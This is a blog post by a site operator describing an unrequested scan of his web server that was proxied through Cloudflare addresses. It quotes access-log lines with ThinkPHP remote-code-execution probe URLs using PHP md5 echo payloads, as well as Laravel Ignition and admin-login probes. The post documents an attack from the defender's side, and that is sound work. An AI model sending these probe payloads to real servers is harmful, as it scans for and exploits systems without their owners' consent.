An unrequested web vulnerability scan from cloudflare IPv4 space / 2023-02-24

Koos van den Hout

2023-02-24 An unrequested web vulnerability scan from cloudflare IPv4 space
I noticed a strange peak in web traffic today and when digging in to it found out it was a web vulnerability scan. What made me look further was the fact that the source IPv4 addresses were randomized over quite a range, so any automatic firewalling wouldn't block the attempts.

This turned out to originate from cloudflare IPv4 space. Interesting how the source IP addresses clearly spread out (which would circumvent a lot of automatic web application firewalls). 
172.70.251.143 - - [24/Feb/2023:09:52:22 +0100] "GET /index.php?s=%2Fadmin%2Fthink%5Capp%2FinvokeMethod&method%5B0%5D=think%5Cview%5Cdriver%5CPhp&method%5B1%5D=display&vars%5B0%5D=%3C%3Fphp+echo+md5%28%271f3870be274f6c49b3e31a0c6728957f%27%29%3B HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.16 - - [24/Feb/2023:09:52:24 +0100] "GET /index.php?s=%2Fuser%2Fthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=1f3870be274f6c49b3e31a0c6728957f HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.146 - - [24/Feb/2023:09:52:26 +0100] "GET /index.php?s=index%2Fuser%2F_empty HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.56 - - [24/Feb/2023:09:52:27 +0100] "GET /admin/auth/login HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.250.40 - - [24/Feb/2023:09:52:27 +0100] "GET /admin/public/login.html HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.250.41 - - [24/Feb/2023:09:52:28 +0100] "GET /index.php?s=%2Fadmin%2Fthink%5Capp%2FinvokeMethod&method%5B0%5D=think%5Cview%5Cdriver%5CPhp&method%5B1%5D=display&vars%5B0%5D=%3C%3Fphp+echo+md5%28%271f3870be274f6c49b3e31a0c6728957f%27%29%3B HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.56 - - [24/Feb/2023:09:52:28 +0100] "POST /_ignition/execute-solution HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.57 - - [24/Feb/2023:09:52:29 +0100] "GET /admin/auth/login HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.57 - - [24/Feb/2023:09:52:29 +0100] "GET /seller/login/reg HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.16 - - [24/Feb/2023:09:52:29 +0100] "GET /index.php?s=%2Fuser%2Fthink%5Capp%2FinvokeMethod&method%5B0%5D=think%5Cview%5Cdriver%5CPhp&method%5B1%5D=display&vars%5B0%5D=%3C%3Fphp+echo+md5%28%271f3870be274f6c49b3e31a0c6728957f%27%29%3B HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.247.24 - - [24/Feb/2023:09:52:31 +0100] "GET /index.php?s=%2Fadmin%2Fthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=1f3870be274f6c49b3e31a0c6728957f HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.16 - - [24/Feb/2023:09:52:31 +0100] "GET /index.php?s=%2Fapi%2Fthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=1f3870be274f6c49b3e31a0c6728957f HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.57 - - [24/Feb/2023:09:52:35 +0100] "GET /ch/upload/upload HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.16 - - [24/Feb/2023:09:52:35 +0100] "GET /index.php?s=index%2Fuser%2F_empty HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.132 - - [24/Feb/2023:09:52:36 +0100] "GET /admin/auth/login HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.146 - - [24/Feb/2023:09:52:36 +0100] "GET /admin/public/login.html HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.146 - - [24/Feb/2023:09:52:37 +0100] "GET /loginMe HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.57 - - [24/Feb/2023:09:52:39 +0100] "GET /_ignition/execute-solution HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.242.219 - - [24/Feb/2023:09:52:40 +0100] "GET /admin/auth/login HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.132 - - [24/Feb/2023:09:52:40 +0100] "GET /admin/other_cert/cert.php HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.70.46.17 - - [24/Feb/2023:09:52:41 +0100] "GET /index.php?case=admin&act=login&admin_dir=admin&site=default HTTP/1.1" 404 972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
I checked with someone who uses cloudflare for sites and these IPv4 addresses match how cloudflare proxies sites. My current theory is that someone set up a cloudflare proxy with my site as 'backend' and scanned the 'frontend' to make it harder for me to find the origin.

At this moment the cloudflare abuse form doesn't work for me. I don't have a lot of trust in cloudflare doing things to stop abuse from cloudflare customers so I'm not going to jump through more hoops to get them to notice this, I expect a big dissapointment when I get an actual answer from them.
Tags: ,

IPv6 check

Running test...

Archive

Browse the recent archive:
March 2023
February 2023
January 2023
December 2022
November 2022
October 2022
September 2022
August 2022
July 2022
June 2022
May 2022
April 2022
News archive
, reachable as koos+website@idefix.net. PGP encrypted e-mail preferred. PGP key 5BA9 368B E6F3 34E4 local copy PGP key 5BA9 368B E6F3 34E4 via keyservers

RSS
Meningen zijn die van mezelf, wat ik schrijf is beschermd door auteursrecht. Sommige publicaties bevatten een expliciete vermelding dat ze ongevraagd gedeeld mogen worden.
My opinions are my own, what I write is protected by copyrights. Some publications contain an explicit license statement which allows sharing without asking permission.
Other webprojects: Camp Wireless, wireless Internet access at campsites, The Virtual Bookcase, book reviews
This page generated by $Id: newsitem.cgi,v 1.58 2022/12/12 15:34:31 koos Exp $ in 0.010340 seconds.